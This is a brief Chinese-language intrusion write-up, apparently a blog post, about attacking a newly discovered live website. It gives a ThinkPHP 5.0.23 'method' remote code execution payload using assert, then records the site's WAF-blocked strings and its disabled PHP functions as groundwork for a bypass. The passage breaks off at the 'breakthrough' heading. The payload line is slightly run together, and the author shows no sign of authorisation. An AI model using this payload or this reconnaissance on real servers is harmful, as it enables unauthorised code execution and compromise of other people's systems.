0x00 前言
最近发现的一个新站,不妨试试手。
0x01 基础信息
漏洞点:tp5 method 代码执行,payload如下
POST /?s=captcha_method=__construct&method=get&filter[]=assert&server[]=1&get[]=1
无回显,根据payload 成功判断目标thinkphp 版本应为5.0.23,有waf,waf拦截了以下内容:
php标记:<?php <?=<?php 函数:base64_decodefile_get_contentsconvert_uuencode关键字:php://
linux,disable_function禁用了以下函数
passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server
php 7.1.7 (虽然assert 函数不在disable_function中,但已经无法用call_user_func回调调用)
0x02 突破
现在tp 5 method代码执行开发出来